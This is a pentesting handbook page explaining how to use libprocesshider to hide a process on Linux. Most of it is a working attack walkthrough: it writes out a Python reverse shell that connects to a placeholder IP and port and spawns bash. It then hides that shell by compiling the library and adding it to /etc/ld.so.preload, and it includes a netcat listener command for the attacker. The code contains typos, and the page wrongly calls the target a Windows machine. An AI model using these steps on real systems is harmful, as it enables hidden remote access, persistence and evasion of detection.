handbook/tools/5.Machine/1.Linux/General/Exploitation/AV-Detection-Evasion/Evasion-Techniques/Tools/Libprocesshider.md

72 lines
1.8 KiB
Markdown
Raw Permalink Normal View History

2024-08-30 23:07:22 +00:00
## General
GOAL ---> Hide process from `ps aux`
Libprocesshider is a library that allows software developers to hide the details of a process from the operating system. It provides an API for hiding the process name and arguments, as well as for hiding the presence of the process from process management utilities. The library is useful for hiding the details of malware or other types of malicious software, as well as for protecting proprietary software from reverse engineering.
Important
- Can only hide one process at the time
## Commands
The reposity need to be cloned on the target (windows machine)
Download the reposity (Target)
```
git clone https://github.com/gianlucaborello/libprocesshider.git
```
Create reverse shell and compile the code (Target)
```
# Create a rever shell (reverse_shell.py)
nano reverse_shell.py
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP",PORT))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run([*/bin/bash","-i*])
# Give chmod permission
chmod +x reverse_shell.py
# Edit processhider.c
nano processhider.c
- Change the script name of the python code for your evil code
- Save
# Compile the code in the direcotry
USER@sid:~/libprocesshider$ make
'---> This will create libprocesshider.so
# Copy the file in the right folder
cp libprocesshider.so /usr/local/lib/
# Load it with the global dynamic linker
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
```
Launch the reverse_shell
```
./reverse_shell.py
```
Netcat Lisener (Attacking)
```
nc -lvnp PORT
```
The process should now be hiden
## More Information
More information ---> https://github.com/gianlucaborello/libprocesshider